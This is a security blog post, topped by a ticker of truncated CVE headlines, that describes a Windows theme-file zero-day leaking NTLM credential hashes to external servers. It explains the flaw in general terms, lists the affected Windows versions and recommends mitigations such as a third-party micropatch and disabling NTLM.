⚠️ CVE-2025-7602: A vulnerability was found in D... 🟡 CVE-2025-7601: A vulnerability has been found... 🟡 CVE-2025-7600: A vulnerability, which was cla... 🟡 CVE-2025-7599: A vulnerability, which was cla... 🟡 CVE-2025-7618: A stored Cross-Site Scripting ... ⚠️ CVE-2025-7598: A vulnerability classified as ... ⚠️ CVE-2025-7597: A vulnerability classified as ... ⚠️ CVE-2025-7596: A vulnerability was found in T... 🟡 CVE-2025-7595: A vulnerability was found in c... 🟡 CVE-2025-7594: A vulnerability was found in c... 🟡 CVE-2025-7593: A vulnerability was found in c... 🟡 CVE-2025-7592: A vulnerability has been found... ⚠️ CVE-2024-26293: The Avid Nexis Agent uses a vu... 🟡 CVE-2025-7591: A vulnerability, which was cla... 🟡 CVE-2025-7590: A vulnerability, which was cla... 🟡 CVE-2025-7589: A vulnerability classified as ... 🟡 CVE-2025-7588: A vulnerability classified as ... 🟡 CVE-2025-7587: A vulnerability was found in c... 🟡 CVE-2025-24391: A vulnerability in the Externa... ⚠️ CVE-2024-26292: An authenticated Arbitrary Fil... ⚠️ CVE-2024-26291: An Unauthenticated Arbitrary F... ⚠️ CVE-2025-7586: A vulnerability was found in T... 🟡 CVE-2025-7585: A vulnerability was found in P... 🟡 CVE-2025-7584: A vulnerability was found in P... 🟡 CVE-2025-7583: A vulnerability has been found... 🟡 CVE-2025-7582: A vulnerability, which was cla... 🟡 CVE-2025-7581: A vulnerability, which was cla... 🟡 CVE-2025-7580: A vulnerability classified as ... 🟡 CVE-2025-7579: A vulnerability was found in c... 🟢 CVE-2025-7578: A vulnerability was found in T... 🟡 CVE-2025-7577: A vulnerability was found in T... 🟡 CVE-2025-7576: A vulnerability was found in T... 🟡 CVE-2025-7575: A vulnerability has been found... 🟡 CVE-2025-7380: A stored Cross-Site Scripting ... ⚠️ CVE-2025-7574: A vulnerability, which was cla... 🟡 CVE-2025-7573: A vulnerability, which was cla... 🟡 CVE-2025-7572: A vulnerability classified as ... ⚠️ CVE-2025-7571: A vulnerability classified as ... 🟡 CVE-2025-29606: py-libp2p before 0.2.3 allows ... ⚠️ CVE-2025-7620: The cross-browser document cre... ⚠️ CVE-2025-7619: BatchSignCS, a background Wind... ⚠️ CVE-2025-7570: A vulnerability was found in U... 🟡 CVE-2025-7569: A vulnerability was found in B... 🟡 CVE-2025-7568: A vulnerability was found in q... 🟡 CVE-2025-7567: A vulnerability was found in S... 🟡 CVE-2025-7566: A vulnerability has been found... 🟡 CVE-2025-7565: A vulnerability, which was cla... ⚠️ CVE-2025-7564: A vulnerability, which was cla... 🟡 CVE-2025-7563: A vulnerability classified as ... 🟡 CVE-2025-7562: A vulnerability classified as ... 🔥 CVE-2025-7451: The iSherlock developed by Hgi... 🟡 CVE-2025-7561: A vulnerability was found in P... 🟡 CVE-2025-7560: A vulnerability was found in P... 🟡 CVE-2025-7559: A vulnerability was found in P... 🟡 CVE-2025-7558: A vulnerability was found in c... 🟡 CVE-2025-7557: A vulnerability has been found... 🟡 CVE-2025-7556: A vulnerability, which was cla... 🟡 CVE-2025-7555: A vulnerability, which was cla... 🟡 CVE-2025-7554: A vulnerability classified as ... 🟡 CVE-2025-7553: A vulnerability classified as ... 🟡 CVE-2025-7552: A vulnerability was found in D... ⚠️ CVE-2025-7551: A vulnerability was found in T... ⚠️ CVE-2025-1384: Least Privilege Violation (CWE... ⚠️ CVE-2025-7550: A vulnerability was found in T... ⚠️ CVE-2025-7549: A vulnerability was found in T... ⚠️ CVE-2025-7548: A vulnerability has been found... 🟡 CVE-2025-7547: A vulnerability, which was cla... 🟡 CVE-2025-1735: In PHP versions:8.1.* before 8... 🟢 CVE-2025-1220: In PHP versions:8.1.* before 8... 🟡 CVE-2025-7546: A vulnerability, which was cla... 🟡 CVE-2025-7545: A vulnerability classified as ... ⚠️ CVE-2025-7544: A vulnerability was found in T... 🟡 CVE-2025-7543: A vulnerability was found in P... 🟡 CVE-2025-6491: In PHP versions:8.1.* before 8... ⚠️ CVE-2024-58258: SugarCRM before 13.0.4 and 14.... 🟡 CVE-2025-7542: A vulnerability was found in P... 🟡 CVE-2025-7541: A vulnerability has been found... 🟡 CVE-2025-7540: A vulnerability, which was cla... 🟡 CVE-2025-7539: A vulnerability, which was cla... 🟡 CVE-2025-53865: In Roundup before 2.5.0, XSS c... 🟡 CVE-2025-7538: A vulnerability classified as ... 🟡 CVE-2025-7537: A vulnerability classified as ... 🟡 CVE-2025-7536: A vulnerability was found in C... 🟡 CVE-2025-7535: A vulnerability was found in C... 🟡 CVE-2025-7534: A vulnerability was found in P... 🟡 CVE-2025-7533: A vulnerability was found in c... ⚠️ CVE-2025-7532: A vulnerability has been found... ⚠️ CVE-2025-7531: A vulnerability, which was cla... ⚠️ CVE-2025-7530: A vulnerability, which was cla... ⚠️ CVE-2025-7529: A vulnerability classified as ... ⚠️ CVE-2025-7528: A vulnerability classified as ... ⚠️ CVE-2025-7527: A vulnerability was found in T... 🟡 CVE-2025-7525: A vulnerability was found in T... 🟡 CVE-2025-7524: A vulnerability was found in T... ⚠️ CVE-2025-7012: An issue in Cato Networks' Cat... 🟡 CVE-2025-7523: A vulnerability was found in J... 🟡 CVE-2025-7522: A vulnerability has been found... 🟡 CVE-2025-7521: A vulnerability, which was cla... 🟡 CVE-2025-7520: A vulnerability, which was cla... 🟡 CVE-2025-7517: A vulnerability, which was cla...
Windows Zero-Day Vulnerability: Credential Theft Across Windows Versions

By Cybersecurity Team on

Windows Zero-Day Vulnerability: Credential Theft Across Windows Versions

Overview

A critical zero-day vulnerability affecting all supported versions of Windows, from Windows 7 through Windows 11, and Windows Server 2008 R2 onwards, has been discovered. This flaw allows attackers to steal NTLM (NT LAN Manager) credentials by exploiting maliciously crafted Windows Theme files. By leveraging this vulnerability, attackers can intercept sensitive credentials with minimal user interaction.

How the Vulnerability Works

The exploit involves Windows Theme files that include references to external network paths. When a user previews or interacts with these files, Windows automatically sends NTLM authentication requests to the specified external server. These authentication requests, containing hashed credentials, can be intercepted and used in pass-the-hash attacks or relayed to gain unauthorized access to systems.

Impacted Systems

This vulnerability impacts:

  • All desktop versions of Windows, from Windows 7 through Windows 11 (including Windows 11 24H2).
  • Windows Server versions, starting from 2008 R2 and onward.

Mitigation and Protection

Microsoft has not yet released an official patch for this vulnerability. However, temporary fixes and third-party solutions are available to mitigate the risk:

  • ACROS Security’s Micropatch: This patch prevents NTLM credential leaks by identifying and blocking malicious network paths in theme files.
  • Group Policy Settings: Disable NTLM authentication where possible and enforce modern authentication protocols like Kerberos.
  • Antivirus and Monitoring Tools: Ensure that antivirus software is updated and actively monitoring for malicious theme files.
  • User Education: Educate users to avoid downloading or interacting with untrusted Windows theme files.

Conclusion

This zero-day vulnerability highlights the ongoing risk posed by legacy authentication protocols like NTLM. Until an official patch is released, organizations and users must adopt mitigation strategies to safeguard their systems and credentials. Keeping systems updated and applying temporary patches can significantly reduce exposure to this exploit.

Back to Posts